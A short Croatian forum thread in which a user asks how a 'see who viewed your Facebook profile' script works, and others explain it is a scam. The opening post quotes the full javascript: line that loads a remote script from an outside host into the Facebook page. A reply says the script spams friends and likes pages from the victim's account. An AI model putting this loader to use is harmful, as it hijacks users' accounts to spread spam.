Neko smeće u vezi fejsbuka

poruka: 3
|
čitano: 1.806
|
moderatori: XXX-Man, vincimus
1
+/- sve poruke
ravni prikaz
starije poruke gore
16 godina

Kratko pitanje (nadam se da nisam fulal podforum). Naišao sam na neku skriptu koja navodno prati tko je sve pregledao xyz profil na fejsbuku. Vidi se iz aviona da je neka prevara u pitanju, ali svejedno me kopka na kako funkcionira. Budući da nemam dume o programiranju, možda netko zna:

###javascript:(a=(b=document).createElement('script')).src='//inferno15.byethost32.com/b13.js?'+Math.random(),b.body.appendChild(a);void(0)### (bez hasheva normalno), piše samo da bi trebalo pejstat u url na fejsbuku (što naravno neću), ali eto...

0 1 hvala 0
16 godina
odjavljen
Re: Neko smeće u vezi fejsbuka

Koliko sam uspio skužiti zaspama ti zidove svim prijateljima s linkom na neku stranicu, onima koji su online zaspama i chat, te sa tvog profila like-a 18 stranica na face-u.

Big wheel keep on turning, Proud Mary keep on burning, Trolling, trolling, trolling on the river.
16 godina

Nije mi jasno kako ljudi mogu nasjesti na takve stvari.

Da postoji mogućnost provjere tko je posjetio čiji profil, Facebook bi sam uveo takvo nešto na FB profil.

Sve one grupe i gluposti - "Saznaj tko ti gleda profil" su prevara i koliko vidim ljudi stvarno nasjedaju na to.

Sve novosti o nadogradnjama FB-a i njegovim mogućnostima možete pratiti na http://www.facebook-hrvatska.com/

1
Nova poruka
E-mail:
Lozinka:

vrh stranice